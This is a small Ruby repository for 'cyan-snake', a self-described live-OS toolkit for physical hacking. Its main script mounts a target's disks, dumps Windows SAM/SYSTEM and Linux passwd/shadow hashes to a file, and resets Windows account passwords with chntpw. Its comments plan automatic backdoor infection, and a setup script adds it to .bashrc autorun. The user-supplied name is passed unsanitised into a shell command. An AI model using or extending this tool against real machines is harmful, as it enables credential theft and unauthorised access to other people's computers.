├── README.md
├── set_liveos.rb
├── LICENSE
├── .gitignore
└── cyan-snake.rb


/README.md:
--------------------------------------------------------------------------------
1 | # cyan-snake
2 | Live OS for Physical hacking
3 | 


--------------------------------------------------------------------------------
/set_liveos.rb:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | cmd = "0"
 4 | puts " -- boot mode" 
 5 | puts " select number for boot" 
 6 | puts " [1] terminal mode" 
 7 | puts " [2] graphic mode" 
 8 | print "#> "
 9 | cmd = gets.chomp
10 | if cmd == "1"
11 |   system("ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target")
12 |   puts " - success terminal mode"
13 | end
14 | if cmd == "2"
15 |   system("ln -sf /lib/systemd/system/graphical.target  /etc/systemd/system/default.target")
16 |   puts " - success graphic mode"
17 | end
18 | 
19 | 
20 | cmd = "0"
21 | puts " -- autorun mode" 
22 | puts " select number for autorun(.bashrc)" 
23 | puts " [1] yes" 
24 | puts " [2] no" 
25 | print "#> "
26 | cmd = gets.chomp
27 | if cmd == "1"
28 |   system("echo 'ruby "+File.dirname(__FILE__)+"/cyan-snake.rb' >> ~/.bashrc")
29 |   puts "success autorun" 
30 | end
31 | 
32 | if cmd == "2"
33 |  puts "no autorun" 
34 | end
35 | 
36 | 
37 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2017 하훌(HAHWUL)
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | *.gem
 2 | *.rbc
 3 | /.config
 4 | /coverage/
 5 | /InstalledFiles
 6 | /pkg/
 7 | /spec/reports/
 8 | /spec/examples.txt
 9 | /test/tmp/
10 | /test/version_tmp/
11 | /tmp/
12 | 
13 | # Used by dotenv library to load environment variables.
14 | # .env
15 | 
16 | ## Specific to RubyMotion:
17 | .dat*
18 | .repl_history
19 | build/
20 | *.bridgesupport
21 | build-iPhoneOS/
22 | build-iPhoneSimulator/
23 | 
24 | ## Specific to RubyMotion (use of CocoaPods):
25 | #
26 | # We recommend against adding the Pods directory to your .gitignore. However
27 | # you should judge for yourself, the pros and cons are mentioned at:
28 | # https://guides.cocoapods.org/using/using-cocoapods.html#should-i-check-the-pods-directory-into-source-control
29 | #
30 | # vendor/Pods/
31 | 
32 | ## Documentation cache and generated files:
33 | /.yardoc/
34 | /_yardoc/
35 | /doc/
36 | /rdoc/
37 | 
38 | ## Environment normalization:
39 | /.bundle/
40 | /vendor/bundle
41 | /lib/bundler/man/
42 | 
43 | # for a library or gem, you might want to ignore these files since the code is
44 | # intended to run in multiple environments; otherwise, check them in:
45 | # Gemfile.lock
46 | # .ruby-version
47 | # .ruby-gemset
48 | 
49 | # unless supporting rvm < 1.11.0 or doing something fancy, ignore this:
50 | .rvmrc
51 | 


--------------------------------------------------------------------------------
/cyan-snake.rb:
--------------------------------------------------------------------------------
  1 | 
  2 | ###
  3 | #
  4 | # Default Action
  5 | # - Get System Information
  6 | #  + Computer name
  7 | #  + Network config
  8 | 
  9 | # 1 > ON UI MODE
 10 | # 1-1 > Dump Hash(Win: SAM+SYSTEM / Linux: passwd+shadow)
 11 | # 1-2 > Change password(only windows)
 12 | # 1-3 > 
 13 | 
 14 | # 2 > OFF UI MODE(Auto mode)
 15 | # 2-1 > Auto Gathering System Information
 16 | # 2-2 > Auto Infection(remote backdoor)
 17 | # 2-3 > Auto Infection(bind backdoor)
 18 | 
 19 | @devices = Array.new()
 20 | @message = ""
 21 | 
 22 | def getcmd()
 23 |   system("clear")
 24 | puts "                      __    __    __    __  "
 25 | puts "                     /  \\  /  \\  /  \\  /  \\  "
 26 | puts "____________________/  __\\/  __\\/  __\\/  __\\_____________________________  "
 27 | puts "____CYAN-SNAKE_____/  /__/  /__/  /__/  /_________CODE BY HAHWUL_________  "
 28 | puts "                   | / \\   / \\   / \\   / \\  \\____  "
 29 | puts "                   |/   \\_/   \\_/   \\_/   \\    @ \\ "
 30 | puts "                                           \\_____/--<  "
 31 |   puts @message
 32 |   puts " ____________"
 33 |   print "[cyan-snake] #> "
 34 |   cmd = gets.chomp 
 35 |   return cmd
 36 | end
 37 | 
 38 | def sinit()
 39 |   IO.popen("fdisk -l -o Device", 'r') do |pipe|
 40 |    pipe.each_line do |line|
 41 |     if line[0..4] == "/dev/"
 42 |       @devices.push(line)
 43 |       puts "mount "+line.strip+" /mnt/"+line[5,8]
 44 |       #system("mount "+line.strip+" /mnt/"+line[5,8])
 45 |     end
 46 |    end
 47 |   end
 48 | end
 49 | 
 50 | def f1()
 51 |  @message = "(/1)\nPlease choice\n [1] > Dump Hash(Win: SAM+SYSTEM / Linux: passwd+shadow)\n [2] > Change password(only windows)\n"
 52 |  cmd = getcmd().downcase
 53 |  if cmd == '1'
 54 |    f11()
 55 |  end
 56 |  if cmd == '2'
 57 |    f12()
 58 |  end 
 59 | end
 60 | 
 61 | def f11()
 62 |  @message = "(/1/1)\nPlease choice\n [1] > Dump Hash(Win: SAM+SYSTEM / Linux: passwd+shadow)\n [2] > Change password(only windows)\n"
 63 |  @devices.each do |mnt|
 64 |   mnt = mnt.strip
 65 |   puts mnt+"/Windows/System32/config/"
 66 |   if(File.exist? File.expand_path(mnt+"/Windows/System32/config/"))
 67 |    Dir.chdir(mnt+"/Windows/System32/config/")
 68 |    system("samdump2 -o /data/dump.txt SYSTEM SAM")
 69 |    gets.chomp
 70 |   end
 71 |   
 72 |   if(File.exist? File.expand_path(mnt+"/usr/share/"))
 73 |    Dir.chdir(mnt+"/etc/")
 74 |    system("unshadow passwd shadow > /data/dump.txt")
 75 |    gets.chomp
 76 |   end
 77 | 
 78 | end
 79 | end
 80 | 
 81 | def f12()
 82 |  @message = "(/1/2)\nChange password(windows)\n"
 83 |  
 84 |  @devices.each do |mnt|
 85 |   mnt = mnt.strip
 86 |   puts mnt+"/Windows/System32/config/"
 87 |   if(File.exist? File.expand_path(mnt+"/Windows/System32/config/"))
 88 |    Dir.chdir(mnt+"/Windows/System32/config/")
 89 |    system("chntpw -l SAM")
 90 |    puts "Please input user name"
 91 |    print "[cyan-snake] #> "
 92 |    cmd = gets.chomp
 93 |    system("chntpw -u "+cmd+" SAM")
 94 |   end
 95 |  end
 96 | 
 97 |  gets.chomp
 98 | end
 99 | 
100 | sinit()
101 | while 1
102 |   @message = "(/)\nPlease choice\n [1] > UI MODE\n [2] > auto"
103 |   cmd = getcmd().downcase
104 |   if cmd == 'exit' or cmd == 'quit'
105 |     exit()
106 |   end
107 |   if cmd == 'shutdown'
108 |     system("shutdown -h 0")
109 |   end
110 |   if cmd == '1'
111 |     f1()
112 |   end
113 | end 
114 | 
115 | 


--------------------------------------------------------------------------------